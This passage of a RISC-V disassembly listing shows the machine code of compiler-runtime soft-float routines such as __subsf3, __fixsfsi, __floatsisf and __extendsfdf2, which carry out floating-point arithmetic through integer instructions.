8000218c: 00147413 andi s0,s0,1
80002190: 0087e433 or s0,a5,s0
80002194: 07fa8713 addi a4,s5,127
80002198: 0ee05063 blez a4,80002278 <__mulsf3+0x2f0>
8000219c: 00747793 andi a5,s0,7
800021a0: 00078a63 beqz a5,800021b4 <__mulsf3+0x22c>
800021a4: 00f47793 andi a5,s0,15
800021a8: 00400693 li a3,4
800021ac: 00d78463 beq a5,a3,800021b4 <__mulsf3+0x22c>
800021b0: 00440413 addi s0,s0,4
800021b4: 00441793 slli a5,s0,0x4
800021b8: 0007da63 bgez a5,800021cc <__mulsf3+0x244>
800021bc: f80007b7 lui a5,0xf8000
800021c0: fff78793 addi a5,a5,-1 # f7ffffff <_stack_start+0x77ff9b2f>
800021c4: 00f47433 and s0,s0,a5
800021c8: 080a8713 addi a4,s5,128
800021cc: 0fe00793 li a5,254
800021d0: 10e7c463 blt a5,a4,800022d8 <__mulsf3+0x350>
800021d4: 00345793 srli a5,s0,0x3
800021d8: 0300006f j 80002208 <__mulsf3+0x280>
800021dc: 00098a13 mv s4,s3
800021e0: 00048413 mv s0,s1
800021e4: 000b0693 mv a3,s6
800021e8: 00200793 li a5,2
800021ec: 0ef68663 beq a3,a5,800022d8 <__mulsf3+0x350>
800021f0: 00300793 li a5,3
800021f4: 0cf68a63 beq a3,a5,800022c8 <__mulsf3+0x340>
800021f8: 00100613 li a2,1
800021fc: 00000793 li a5,0
80002200: 00000713 li a4,0
80002204: f8c698e3 bne a3,a2,80002194 <__mulsf3+0x20c>
80002208: 00800437 lui s0,0x800
8000220c: fff40413 addi s0,s0,-1 # 7fffff <_stack_size+0x7ffbff>
80002210: 80800537 lui a0,0x80800
80002214: 0087f7b3 and a5,a5,s0
80002218: fff50513 addi a0,a0,-1 # 807fffff <_stack_start+0x7f9b2f>
8000221c: 02c12083 lw ra,44(sp)
80002220: 02812403 lw s0,40(sp)
80002224: 0ff77713 andi a4,a4,255
80002228: 00a7f7b3 and a5,a5,a0
8000222c: 01771713 slli a4,a4,0x17
80002230: 01fa1513 slli a0,s4,0x1f
80002234: 00e7e7b3 or a5,a5,a4
80002238: 02412483 lw s1,36(sp)
8000223c: 02012903 lw s2,32(sp)
80002240: 01c12983 lw s3,28(sp)
80002244: 01812a03 lw s4,24(sp)
80002248: 01412a83 lw s5,20(sp)
8000224c: 01012b03 lw s6,16(sp)
80002250: 00c12b83 lw s7,12(sp)
80002254: 00812c03 lw s8,8(sp)
80002258: 00412c83 lw s9,4(sp)
8000225c: 00a7e533 or a0,a5,a0
80002260: 03010113 addi sp,sp,48
80002264: 00008067 ret
80002268: 000b8a13 mv s4,s7
8000226c: f7dff06f j 800021e8 <__mulsf3+0x260>
80002270: 00090a93 mv s5,s2
80002274: f21ff06f j 80002194 <__mulsf3+0x20c>
80002278: 00100793 li a5,1
8000227c: 40e787b3 sub a5,a5,a4
80002280: 01b00713 li a4,27
80002284: 06f74063 blt a4,a5,800022e4 <__mulsf3+0x35c>
80002288: 09ea8a93 addi s5,s5,158
8000228c: 00f457b3 srl a5,s0,a5
80002290: 01541433 sll s0,s0,s5
80002294: 00803433 snez s0,s0
80002298: 0087e433 or s0,a5,s0
8000229c: 00747793 andi a5,s0,7
800022a0: 00078a63 beqz a5,800022b4 <__mulsf3+0x32c>
800022a4: 00f47793 andi a5,s0,15
800022a8: 00400713 li a4,4
800022ac: 00e78463 beq a5,a4,800022b4 <__mulsf3+0x32c>
800022b0: 00440413 addi s0,s0,4
800022b4: 00541793 slli a5,s0,0x5
800022b8: 0207ca63 bltz a5,800022ec <__mulsf3+0x364>
800022bc: 00345793 srli a5,s0,0x3
800022c0: 00000713 li a4,0
800022c4: f45ff06f j 80002208 <__mulsf3+0x280>
800022c8: 004007b7 lui a5,0x400
800022cc: 0ff00713 li a4,255
800022d0: 00000a13 li s4,0
800022d4: f35ff06f j 80002208 <__mulsf3+0x280>
800022d8: 00000793 li a5,0
800022dc: 0ff00713 li a4,255
800022e0: f29ff06f j 80002208 <__mulsf3+0x280>
800022e4: 00000793 li a5,0
800022e8: fd9ff06f j 800022c0 <__mulsf3+0x338>
800022ec: 00000793 li a5,0
800022f0: 00100713 li a4,1
800022f4: f15ff06f j 80002208 <__mulsf3+0x280>
800022f8 <__subsf3>:
800022f8: 008007b7 lui a5,0x800
800022fc: fff78793 addi a5,a5,-1 # 7fffff <_stack_size+0x7ffbff>
80002300: ff010113 addi sp,sp,-16
80002304: 00a7f733 and a4,a5,a0
80002308: 01755693 srli a3,a0,0x17
8000230c: 0175d613 srli a2,a1,0x17
80002310: 00b7f7b3 and a5,a5,a1
80002314: 00912223 sw s1,4(sp)
80002318: 01212023 sw s2,0(sp)
8000231c: 0ff6f693 andi a3,a3,255
80002320: 00371813 slli a6,a4,0x3
80002324: 0ff67613 andi a2,a2,255
80002328: 00112623 sw ra,12(sp)
8000232c: 00812423 sw s0,8(sp)
80002330: 0ff00713 li a4,255
80002334: 01f55493 srli s1,a0,0x1f
80002338: 00068913 mv s2,a3
8000233c: 00060513 mv a0,a2
80002340: 01f5d593 srli a1,a1,0x1f
80002344: 00379793 slli a5,a5,0x3
80002348: 00e61463 bne a2,a4,80002350 <__subsf3+0x58>
8000234c: 00079463 bnez a5,80002354 <__subsf3+0x5c>
80002350: 0015c593 xori a1,a1,1
80002354: 40c68733 sub a4,a3,a2
80002358: 1a959a63 bne a1,s1,8000250c <__subsf3+0x214>
8000235c: 0ae05663 blez a4,80002408 <__subsf3+0x110>
80002360: 06061663 bnez a2,800023cc <__subsf3+0xd4>
80002364: 00079c63 bnez a5,8000237c <__subsf3+0x84>
80002368: 0ff00793 li a5,255
8000236c: 04f68c63 beq a3,a5,800023c4 <__subsf3+0xcc>
80002370: 00080793 mv a5,a6
80002374: 00068513 mv a0,a3
80002378: 14c0006f j 800024c4 <__subsf3+0x1cc>
8000237c: fff70713 addi a4,a4,-1
80002380: 02071e63 bnez a4,800023bc <__subsf3+0xc4>
80002384: 010787b3 add a5,a5,a6
80002388: 00068513 mv a0,a3
8000238c: 00579713 slli a4,a5,0x5
80002390: 12075a63 bgez a4,800024c4 <__subsf3+0x1cc>
80002394: 00150513 addi a0,a0,1
80002398: 0ff00713 li a4,255
8000239c: 32e50e63 beq a0,a4,800026d8 <__subsf3+0x3e0>
800023a0: 7e000737 lui a4,0x7e000
800023a4: 0017f693 andi a3,a5,1
800023a8: fff70713 addi a4,a4,-1 # 7dffffff <_stack_size+0x7dfffbff>
800023ac: 0017d793 srli a5,a5,0x1
800023b0: 00e7f7b3 and a5,a5,a4
800023b4: 00d7e7b3 or a5,a5,a3
800023b8: 10c0006f j 800024c4 <__subsf3+0x1cc>
800023bc: 0ff00613 li a2,255
800023c0: 00c69e63 bne a3,a2,800023dc <__subsf3+0xe4>
800023c4: 00080793 mv a5,a6
800023c8: 0740006f j 8000243c <__subsf3+0x144>
800023cc: 0ff00613 li a2,255
800023d0: fec68ae3 beq a3,a2,800023c4 <__subsf3+0xcc>
800023d4: 04000637 lui a2,0x4000
800023d8: 00c7e7b3 or a5,a5,a2
800023dc: 01b00613 li a2,27
800023e0: 00e65663 ble a4,a2,800023ec <__subsf3+0xf4>
800023e4: 00100793 li a5,1
800023e8: f9dff06f j 80002384 <__subsf3+0x8c>
800023ec: 02000613 li a2,32
800023f0: 40e60633 sub a2,a2,a4
800023f4: 00e7d5b3 srl a1,a5,a4
800023f8: 00c797b3 sll a5,a5,a2
800023fc: 00f037b3 snez a5,a5
80002400: 00f5e7b3 or a5,a1,a5
80002404: f81ff06f j 80002384 <__subsf3+0x8c>
80002408: 08070063 beqz a4,80002488 <__subsf3+0x190>
8000240c: 02069c63 bnez a3,80002444 <__subsf3+0x14c>
80002410: 00081863 bnez a6,80002420 <__subsf3+0x128>
80002414: 0ff00713 li a4,255
80002418: 0ae61663 bne a2,a4,800024c4 <__subsf3+0x1cc>
8000241c: 0200006f j 8000243c <__subsf3+0x144>
80002420: fff00693 li a3,-1
80002424: 00d71663 bne a4,a3,80002430 <__subsf3+0x138>
80002428: 010787b3 add a5,a5,a6
8000242c: f61ff06f j 8000238c <__subsf3+0x94>
80002430: 0ff00693 li a3,255
80002434: fff74713 not a4,a4
80002438: 02d61063 bne a2,a3,80002458 <__subsf3+0x160>
8000243c: 0ff00513 li a0,255
80002440: 0840006f j 800024c4 <__subsf3+0x1cc>
80002444: 0ff00693 li a3,255
80002448: fed60ae3 beq a2,a3,8000243c <__subsf3+0x144>
8000244c: 040006b7 lui a3,0x4000
80002450: 40e00733 neg a4,a4
80002454: 00d86833 or a6,a6,a3
80002458: 01b00693 li a3,27
8000245c: 00e6d663 ble a4,a3,80002468 <__subsf3+0x170>
80002460: 00100713 li a4,1
80002464: 01c0006f j 80002480 <__subsf3+0x188>
80002468: 02000693 li a3,32
8000246c: 00e85633 srl a2,a6,a4
80002470: 40e68733 sub a4,a3,a4
80002474: 00e81733 sll a4,a6,a4
80002478: 00e03733 snez a4,a4
8000247c: 00e66733 or a4,a2,a4
80002480: 00e787b3 add a5,a5,a4
80002484: f09ff06f j 8000238c <__subsf3+0x94>
80002488: 00168513 addi a0,a3,1 # 4000001 <_stack_size+0x3fffc01>
8000248c: 0ff57613 andi a2,a0,255
80002490: 00100713 li a4,1
80002494: 06c74263 blt a4,a2,800024f8 <__subsf3+0x200>
80002498: 04069463 bnez a3,800024e0 <__subsf3+0x1e8>
8000249c: 00000513 li a0,0
800024a0: 02080263 beqz a6,800024c4 <__subsf3+0x1cc>
800024a4: 22078663 beqz a5,800026d0 <__subsf3+0x3d8>
800024a8: 010787b3 add a5,a5,a6
800024ac: 00579713 slli a4,a5,0x5
800024b0: 00075a63 bgez a4,800024c4 <__subsf3+0x1cc>
800024b4: fc000737 lui a4,0xfc000
800024b8: fff70713 addi a4,a4,-1 # fbffffff <_stack_start+0x7bff9b2f>
800024bc: 00e7f7b3 and a5,a5,a4
800024c0: 00100513 li a0,1
800024c4: 0077f713 andi a4,a5,7
800024c8: 20070a63 beqz a4,800026dc <__subsf3+0x3e4>
800024cc: 00f7f713 andi a4,a5,15
800024d0: 00400693 li a3,4
800024d4: 20d70463 beq a4,a3,800026dc <__subsf3+0x3e4>
800024d8: 00478793 addi a5,a5,4
800024dc: 2000006f j 800026dc <__subsf3+0x3e4>
800024e0: f4080ee3 beqz a6,8000243c <__subsf3+0x144>
800024e4: ee0780e3 beqz a5,800023c4 <__subsf3+0xcc>
800024e8: 020007b7 lui a5,0x2000
800024ec: 0ff00513 li a0,255
800024f0: 00000493 li s1,0
800024f4: 1e80006f j 800026dc <__subsf3+0x3e4>
800024f8: 0ff00713 li a4,255
800024fc: 1ce50e63 beq a0,a4,800026d8 <__subsf3+0x3e0>
80002500: 00f80733 add a4,a6,a5
80002504: 00175793 srli a5,a4,0x1
80002508: fbdff06f j 800024c4 <__subsf3+0x1cc>
8000250c: 08e05063 blez a4,8000258c <__subsf3+0x294>
80002510: 04061663 bnez a2,8000255c <__subsf3+0x264>
80002514: e4078ae3 beqz a5,80002368 <__subsf3+0x70>
80002518: fff70713 addi a4,a4,-1
8000251c: 02071463 bnez a4,80002544 <__subsf3+0x24c>
80002520: 40f807b3 sub a5,a6,a5
80002524: 00068513 mv a0,a3
80002528: 00579713 slli a4,a5,0x5
8000252c: f8075ce3 bgez a4,800024c4 <__subsf3+0x1cc>
80002530: 04000437 lui s0,0x4000
80002534: fff40413 addi s0,s0,-1 # 3ffffff <_stack_size+0x3fffbff>
80002538: 0087f433 and s0,a5,s0
8000253c: 00050913 mv s2,a0
80002540: 1380006f j 80002678 <__subsf3+0x380>
80002544: 0ff00613 li a2,255
80002548: e6c68ee3 beq a3,a2,800023c4 <__subsf3+0xcc>
8000254c: 01b00613 li a2,27
80002550: 02e65063 ble a4,a2,80002570 <__subsf3+0x278>
80002554: 00100793 li a5,1
80002558: fc9ff06f j 80002520 <__subsf3+0x228>
8000255c: 0ff00613 li a2,255
80002560: e6c682e3 beq a3,a2,800023c4 <__subsf3+0xcc>
80002564: 04000637 lui a2,0x4000
80002568: 00c7e7b3 or a5,a5,a2
8000256c: fe1ff06f j 8000254c <__subsf3+0x254>
80002570: 02000613 li a2,32
80002574: 00e7d5b3 srl a1,a5,a4
80002578: 40e60733 sub a4,a2,a4
8000257c: 00e797b3 sll a5,a5,a4
80002580: 00f037b3 snez a5,a5
80002584: 00f5e7b3 or a5,a1,a5
80002588: f99ff06f j 80002520 <__subsf3+0x228>
8000258c: 08070263 beqz a4,80002610 <__subsf3+0x318>
80002590: 02069e63 bnez a3,800025cc <__subsf3+0x2d4>
80002594: 00081863 bnez a6,800025a4 <__subsf3+0x2ac>
80002598: 0ff00713 li a4,255
8000259c: 00058493 mv s1,a1
800025a0: e79ff06f j 80002418 <__subsf3+0x120>
800025a4: fff00693 li a3,-1
800025a8: 00d71863 bne a4,a3,800025b8 <__subsf3+0x2c0>
800025ac: 410787b3 sub a5,a5,a6
800025b0: 00058493 mv s1,a1
800025b4: f75ff06f j 80002528 <__subsf3+0x230>
800025b8: 0ff00693 li a3,255
800025bc: fff74713 not a4,a4
800025c0: 02d61063 bne a2,a3,800025e0 <__subsf3+0x2e8>
800025c4: 00058493 mv s1,a1
800025c8: e75ff06f j 8000243c <__subsf3+0x144>
800025cc: 0ff00693 li a3,255
800025d0: fed60ae3 beq a2,a3,800025c4 <__subsf3+0x2cc>
800025d4: 040006b7 lui a3,0x4000
800025d8: 40e00733 neg a4,a4
800025dc: 00d86833 or a6,a6,a3
800025e0: 01b00693 li a3,27
800025e4: 00e6d663 ble a4,a3,800025f0 <__subsf3+0x2f8>
800025e8: 00100713 li a4,1
800025ec: 01c0006f j 80002608 <__subsf3+0x310>
800025f0: 02000693 li a3,32
800025f4: 00e85633 srl a2,a6,a4
800025f8: 40e68733 sub a4,a3,a4
800025fc: 00e81733 sll a4,a6,a4
80002600: 00e03733 snez a4,a4
80002604: 00e66733 or a4,a2,a4
80002608: 40e787b3 sub a5,a5,a4
8000260c: fa5ff06f j 800025b0 <__subsf3+0x2b8>
80002610: 00168713 addi a4,a3,1 # 4000001 <_stack_size+0x3fffc01>
80002614: 0ff77713 andi a4,a4,255
80002618: 00100613 li a2,1
8000261c: 04e64463 blt a2,a4,80002664 <__subsf3+0x36c>
80002620: 02069c63 bnez a3,80002658 <__subsf3+0x360>
80002624: 00081863 bnez a6,80002634 <__subsf3+0x33c>
80002628: 12079863 bnez a5,80002758 <__subsf3+0x460>
8000262c: 00000513 li a0,0
80002630: ec1ff06f j 800024f0 <__subsf3+0x1f8>
80002634: 12078663 beqz a5,80002760 <__subsf3+0x468>
80002638: 40f80733 sub a4,a6,a5
8000263c: 00571693 slli a3,a4,0x5
80002640: 410787b3 sub a5,a5,a6
80002644: 1006ca63 bltz a3,80002758 <__subsf3+0x460>
80002648: 00070793 mv a5,a4
8000264c: 06071063 bnez a4,800026ac <__subsf3+0x3b4>
80002650: 00000793 li a5,0
80002654: fd9ff06f j 8000262c <__subsf3+0x334>
80002658: e80816e3 bnez a6,800024e4 <__subsf3+0x1ec>
8000265c: f60794e3 bnez a5,800025c4 <__subsf3+0x2cc>
80002660: e89ff06f j 800024e8 <__subsf3+0x1f0>
80002664: 40f80433 sub s0,a6,a5
80002668: 00541713 slli a4,s0,0x5
8000266c: 04075463 bgez a4,800026b4 <__subsf3+0x3bc>
80002670: 41078433 sub s0,a5,a6
80002674: 00058493 mv s1,a1
80002678: 00040513 mv a0,s0
8000267c: 604000ef jal ra,80002c80 <__clzsi2>
80002680: ffb50513 addi a0,a0,-5
80002684: 00a41433 sll s0,s0,a0
80002688: 03254a63 blt a0,s2,800026bc <__subsf3+0x3c4>
8000268c: 41250533 sub a0,a0,s2
80002690: 00150513 addi a0,a0,1
80002694: 02000713 li a4,32
80002698: 00a457b3 srl a5,s0,a0
8000269c: 40a70533 sub a0,a4,a0
800026a0: 00a41433 sll s0,s0,a0
800026a4: 00803433 snez s0,s0
800026a8: 0087e7b3 or a5,a5,s0
800026ac: 00000513 li a0,0
800026b0: e15ff06f j 800024c4 <__subsf3+0x1cc>
800026b4: f8040ee3 beqz s0,80002650 <__subsf3+0x358>
800026b8: fc1ff06f j 80002678 <__subsf3+0x380>
800026bc: fc0007b7 lui a5,0xfc000
800026c0: fff78793 addi a5,a5,-1 # fbffffff <_stack_start+0x7bff9b2f>
800026c4: 40a90533 sub a0,s2,a0
800026c8: 00f477b3 and a5,s0,a5
800026cc: df9ff06f j 800024c4 <__subsf3+0x1cc>
800026d0: 00080793 mv a5,a6
800026d4: df1ff06f j 800024c4 <__subsf3+0x1cc>
800026d8: 00000793 li a5,0
800026dc: 00579713 slli a4,a5,0x5
800026e0: 00075e63 bgez a4,800026fc <__subsf3+0x404>
800026e4: 00150513 addi a0,a0,1
800026e8: 0ff00713 li a4,255
800026ec: 06e50e63 beq a0,a4,80002768 <__subsf3+0x470>
800026f0: fc000737 lui a4,0xfc000
800026f4: fff70713 addi a4,a4,-1 # fbffffff <_stack_start+0x7bff9b2f>
800026f8: 00e7f7b3 and a5,a5,a4
800026fc: 0ff00713 li a4,255
80002700: 0037d793 srli a5,a5,0x3
80002704: 00e51863 bne a0,a4,80002714 <__subsf3+0x41c>
80002708: 00078663 beqz a5,80002714 <__subsf3+0x41c>
8000270c: 004007b7 lui a5,0x400
80002710: 00000493 li s1,0
80002714: 00800737 lui a4,0x800
80002718: fff70713 addi a4,a4,-1 # 7fffff <_stack_size+0x7ffbff>
8000271c: 0ff57513 andi a0,a0,255
80002720: 00e7f7b3 and a5,a5,a4
80002724: 01751713 slli a4,a0,0x17
80002728: 80800537 lui a0,0x80800
8000272c: 00c12083 lw ra,12(sp)
80002730: 00812403 lw s0,8(sp)
80002734: fff50513 addi a0,a0,-1 # 807fffff <_stack_start+0x7f9b2f>
80002738: 00a7f533 and a0,a5,a0
8000273c: 01f49493 slli s1,s1,0x1f
80002740: 00e56533 or a0,a0,a4
80002744: 00956533 or a0,a0,s1
80002748: 00012903 lw s2,0(sp)
8000274c: 00412483 lw s1,4(sp)
80002750: 01010113 addi sp,sp,16
80002754: 00008067 ret
80002758: 00058493 mv s1,a1
8000275c: f51ff06f j 800026ac <__subsf3+0x3b4>
80002760: 00080793 mv a5,a6
80002764: f49ff06f j 800026ac <__subsf3+0x3b4>
80002768: 00000793 li a5,0
8000276c: f91ff06f j 800026fc <__subsf3+0x404>
80002770 <__fixsfsi>:
80002770: 00800637 lui a2,0x800
80002774: 01755713 srli a4,a0,0x17
80002778: fff60793 addi a5,a2,-1 # 7fffff <_stack_size+0x7ffbff>
8000277c: 0ff77713 andi a4,a4,255
80002780: 07e00593 li a1,126
80002784: 00a7f7b3 and a5,a5,a0
80002788: 01f55693 srli a3,a0,0x1f
8000278c: 04e5f663 bleu a4,a1,800027d8 <__fixsfsi+0x68>
80002790: 09d00593 li a1,157
80002794: 00e5fa63 bleu a4,a1,800027a8 <__fixsfsi+0x38>
80002798: 80000537 lui a0,0x80000
8000279c: fff54513 not a0,a0
800027a0: 00a68533 add a0,a3,a0
800027a4: 00008067 ret
800027a8: 00c7e533 or a0,a5,a2
800027ac: 09500793 li a5,149
800027b0: 00e7dc63 ble a4,a5,800027c8 <__fixsfsi+0x58>
800027b4: f6a70713 addi a4,a4,-150
800027b8: 00e51533 sll a0,a0,a4
800027bc: 02068063 beqz a3,800027dc <__fixsfsi+0x6c>
800027c0: 40a00533 neg a0,a0
800027c4: 00008067 ret
800027c8: 09600793 li a5,150
800027cc: 40e78733 sub a4,a5,a4
800027d0: 00e55533 srl a0,a0,a4
800027d4: fe9ff06f j 800027bc <__fixsfsi+0x4c>
800027d8: 00000513 li a0,0
800027dc: 00008067 ret
800027e0 <__floatsisf>:
800027e0: ff010113 addi sp,sp,-16
800027e4: 00112623 sw ra,12(sp)
800027e8: 00812423 sw s0,8(sp)
800027ec: 00912223 sw s1,4(sp)
800027f0: 10050263 beqz a0,800028f4 <__floatsisf+0x114>
800027f4: 00050413 mv s0,a0
800027f8: 01f55493 srli s1,a0,0x1f
800027fc: 00055463 bgez a0,80002804 <__floatsisf+0x24>
80002800: 40a00433 neg s0,a0
80002804: 00040513 mv a0,s0
80002808: 478000ef jal ra,80002c80 <__clzsi2>
8000280c: 09e00793 li a5,158
80002810: 40a787b3 sub a5,a5,a0
80002814: 09600713 li a4,150
80002818: 06f74063 blt a4,a5,80002878 <__floatsisf+0x98>
8000281c: 00800713 li a4,8
80002820: 00a75663 ble a0,a4,8000282c <__floatsisf+0x4c>
80002824: ff850513 addi a0,a0,-8 # 7ffffff8 <_stack_start+0xffff9b28>
80002828: 00a41433 sll s0,s0,a0
8000282c: 00800537 lui a0,0x800
80002830: fff50513 addi a0,a0,-1 # 7fffff <_stack_size+0x7ffbff>
80002834: 0ff7f793 andi a5,a5,255
80002838: 00a47433 and s0,s0,a0
8000283c: 01779513 slli a0,a5,0x17
80002840: 808007b7 lui a5,0x80800
80002844: fff78793 addi a5,a5,-1 # 807fffff <_stack_start+0x7f9b2f>
80002848: 00f47433 and s0,s0,a5
8000284c: 800007b7 lui a5,0x80000
80002850: 00a46433 or s0,s0,a0
80002854: fff7c793 not a5,a5
80002858: 01f49513 slli a0,s1,0x1f
8000285c: 00f47433 and s0,s0,a5
80002860: 00a46533 or a0,s0,a0
80002864: 00c12083 lw ra,12(sp)
80002868: 00812403 lw s0,8(sp)
8000286c: 00412483 lw s1,4(sp)
80002870: 01010113 addi sp,sp,16
80002874: 00008067 ret
80002878: 09900713 li a4,153
8000287c: 02f75063 ble a5,a4,8000289c <__floatsisf+0xbc>
80002880: 00500713 li a4,5
80002884: 40a70733 sub a4,a4,a0
80002888: 01b50693 addi a3,a0,27
8000288c: 00e45733 srl a4,s0,a4
80002890: 00d41433 sll s0,s0,a3
80002894: 00803433 snez s0,s0
80002898: 00876433 or s0,a4,s0
8000289c: 00500713 li a4,5
800028a0: 00a75663 ble a0,a4,800028ac <__floatsisf+0xcc>
800028a4: ffb50713 addi a4,a0,-5
800028a8: 00e41433 sll s0,s0,a4
800028ac: fc000737 lui a4,0xfc000
800028b0: fff70713 addi a4,a4,-1 # fbffffff <_stack_start+0x7bff9b2f>
800028b4: 00747693 andi a3,s0,7
800028b8: 00e47733 and a4,s0,a4
800028bc: 00068a63 beqz a3,800028d0 <__floatsisf+0xf0>
800028c0: 00f47413 andi s0,s0,15
800028c4: 00400693 li a3,4
800028c8: 00d40463 beq s0,a3,800028d0 <__floatsisf+0xf0>
800028cc: 00470713 addi a4,a4,4
800028d0: 00571693 slli a3,a4,0x5
800028d4: 0006dc63 bgez a3,800028ec <__floatsisf+0x10c>
800028d8: fc0007b7 lui a5,0xfc000
800028dc: fff78793 addi a5,a5,-1 # fbffffff <_stack_start+0x7bff9b2f>
800028e0: 00f77733 and a4,a4,a5
800028e4: 09f00793 li a5,159
800028e8: 40a787b3 sub a5,a5,a0
800028ec: 00375413 srli s0,a4,0x3
800028f0: f3dff06f j 8000282c <__floatsisf+0x4c>
800028f4: 00000413 li s0,0
800028f8: 00000793 li a5,0
800028fc: 00000493 li s1,0
80002900: f2dff06f j 8000282c <__floatsisf+0x4c>
80002904 <__extendsfdf2>:
80002904: 01755793 srli a5,a0,0x17
80002908: ff010113 addi sp,sp,-16
8000290c: 0ff7f793 andi a5,a5,255
80002910: 00812423 sw s0,8(sp)
80002914: 00178713 addi a4,a5,1
80002918: 00800437 lui s0,0x800
8000291c: 00912223 sw s1,4(sp)
80002920: fff40413 addi s0,s0,-1 # 7fffff <_stack_size+0x7ffbff>
80002924: 00112623 sw ra,12(sp)
80002928: 0ff77713 andi a4,a4,255
8000292c: 00100693 li a3,1
80002930: 00a47433 and s0,s0,a0
80002934: 01f55493 srli s1,a0,0x1f
80002938: 06e6d263 ble a4,a3,8000299c <__extendsfdf2+0x98>
8000293c: 38078513 addi a0,a5,896
80002940: 00345793 srli a5,s0,0x3
80002944: 01d41413 slli s0,s0,0x1d
80002948: 00100737 lui a4,0x100
8000294c: fff70713 addi a4,a4,-1 # fffff <_stack_size+0xffbff>
80002950: 00e7f7b3 and a5,a5,a4
80002954: 80100737 lui a4,0x80100
80002958: fff70713 addi a4,a4,-1 # 800fffff <_stack_start+0xf9b2f>
8000295c: 7ff57513 andi a0,a0,2047
80002960: 01451513 slli a0,a0,0x14
80002964: 00e7f7b3 and a5,a5,a4
80002968: 80000737 lui a4,0x80000
8000296c: 00a7e7b3 or a5,a5,a0
80002970: fff74713 not a4,a4
80002974: 01f49513 slli a0,s1,0x1f
80002978: 00e7f7b3 and a5,a5,a4
8000297c: 00a7e733 or a4,a5,a0
80002980: 00c12083 lw ra,12(sp)
80002984: 00040513 mv a0,s0
80002988: 00812403 lw s0,8(sp)
8000298c: 00412483 lw s1,4(sp)
80002990: 00070593 mv a1,a4
80002994: 01010113 addi sp,sp,16
80002998: 00008067 ret
8000299c: 04079463 bnez a5,800029e4 <__extendsfdf2+0xe0>
800029a0: 06040263 beqz s0,80002a04 <__extendsfdf2+0x100>
800029a4: 00040513 mv a0,s0
800029a8: 2d8000ef jal ra,80002c80 <__clzsi2>
800029ac: 00a00793 li a5,10
800029b0: 02a7c263 blt a5,a0,800029d4 <__extendsfdf2+0xd0>
800029b4: 00b00793 li a5,11
800029b8: 40a787b3 sub a5,a5,a0
800029bc: 01550713 addi a4,a0,21
800029c0: 00f457b3 srl a5,s0,a5
800029c4: 00e41433 sll s0,s0,a4
800029c8: 38900713 li a4,905
800029cc: 40a70533 sub a0,a4,a0
800029d0: f79ff06f j 80002948 <__extendsfdf2+0x44>
800029d4: ff550793 addi a5,a0,-11
800029d8: 00f417b3 sll a5,s0,a5
800029dc: 00000413 li s0,0
800029e0: fe9ff06f j 800029c8 <__extendsfdf2+0xc4>
800029e4: 00000793 li a5,0
800029e8: 00040a63 beqz s0,800029fc <__extendsfdf2+0xf8>
800029ec: 00345793 srli a5,s0,0x3
800029f0: 00080737 lui a4,0x80
800029f4: 01d41413 slli s0,s0,0x1d
800029f8: 00e7e7b3 or a5,a5,a4
800029fc: 7ff00513 li a0,2047
80002a00: f49ff06f j 80002948 <__extendsfdf2+0x44>
80002a04: 00000793 li a5,0
80002a08: 00000513 li a0,0
80002a0c: f3dff06f j 80002948 <__extendsfdf2+0x44>
80002a10 <__truncdfsf2>:
80002a10: 00100637 lui a2,0x100
80002a14: fff60613 addi a2,a2,-1 # fffff <_stack_size+0xffbff>
80002a18: 00b67633 and a2,a2,a1
80002a1c: 0145d813 srli a6,a1,0x14
80002a20: 01d55793 srli a5,a0,0x1d
80002a24: 7ff87813 andi a6,a6,2047
80002a28: 00361613 slli a2,a2,0x3
80002a2c: 00c7e633 or a2,a5,a2
80002a30: 00180793 addi a5,a6,1
80002a34: 7ff7f793 andi a5,a5,2047
80002a38: 00100693 li a3,1
80002a3c: 01f5d593 srli a1,a1,0x1f
80002a40: 00351713 slli a4,a0,0x3
80002a44: 0af6d663 ble a5,a3,80002af0 <__truncdfsf2+0xe0>
80002a48: c8080693 addi a3,a6,-896
80002a4c: 0fe00793 li a5,254
80002a50: 0cd7c263 blt a5,a3,80002b14 <__truncdfsf2+0x104>
80002a54: 08d04063 bgtz a3,80002ad4 <__truncdfsf2+0xc4>
80002a58: fe900793 li a5,-23
80002a5c: 12f6c463 blt a3,a5,80002b84 <__truncdfsf2+0x174>
80002a60: 008007b7 lui a5,0x800
80002a64: 01e00513 li a0,30
80002a68: 00f66633 or a2,a2,a5
80002a6c: 40d50533 sub a0,a0,a3
80002a70: 01f00793 li a5,31
80002a74: 02a7c863 blt a5,a0,80002aa4 <__truncdfsf2+0x94>
80002a78: c8280813 addi a6,a6,-894
80002a7c: 010717b3 sll a5,a4,a6
80002a80: 00f037b3 snez a5,a5
80002a84: 01061633 sll a2,a2,a6
80002a88: 00a75533 srl a0,a4,a0
80002a8c: 00c7e7b3 or a5,a5,a2
80002a90: 00f567b3 or a5,a0,a5
80002a94: 00000693 li a3,0
80002a98: 0077f713 andi a4,a5,7
80002a9c: 08070063 beqz a4,80002b1c <__truncdfsf2+0x10c>
80002aa0: 0ec0006f j 80002b8c <__truncdfsf2+0x17c>
80002aa4: ffe00793 li a5,-2
80002aa8: 40d786b3 sub a3,a5,a3
80002aac: 02000793 li a5,32
80002ab0: 00d656b3 srl a3,a2,a3
80002ab4: 00000893 li a7,0
80002ab8: 00f50663 beq a0,a5,80002ac4 <__truncdfsf2+0xb4>
80002abc: ca280813 addi a6,a6,-862
80002ac0: 010618b3 sll a7,a2,a6
80002ac4: 00e8e7b3 or a5,a7,a4
80002ac8: 00f037b3 snez a5,a5
80002acc: 00f6e7b3 or a5,a3,a5
80002ad0: fc5ff06f j 80002a94 <__truncdfsf2+0x84>
80002ad4: 00651513 slli a0,a0,0x6
80002ad8: 00a03533 snez a0,a0
80002adc: 00361613 slli a2,a2,0x3
80002ae0: 01d75793 srli a5,a4,0x1d
80002ae4: 00c56633 or a2,a0,a2
80002ae8: 00f667b3 or a5,a2,a5
80002aec: fadff06f j 80002a98 <__truncdfsf2+0x88>
80002af0: 00e667b3 or a5,a2,a4
80002af4: 00081663 bnez a6,80002b00 <__truncdfsf2+0xf0>
80002af8: 00f037b3 snez a5,a5
80002afc: f99ff06f j 80002a94 <__truncdfsf2+0x84>
80002b00: 0ff00693 li a3,255
80002b04: 00078c63 beqz a5,80002b1c <__truncdfsf2+0x10c>
80002b08: 00361613 slli a2,a2,0x3
80002b0c: 020007b7 lui a5,0x2000
80002b10: fd9ff06f j 80002ae8 <__truncdfsf2+0xd8>
80002b14: 00000793 li a5,0
80002b18: 0ff00693 li a3,255
80002b1c: 00579713 slli a4,a5,0x5
80002b20: 00075e63 bgez a4,80002b3c <__truncdfsf2+0x12c>
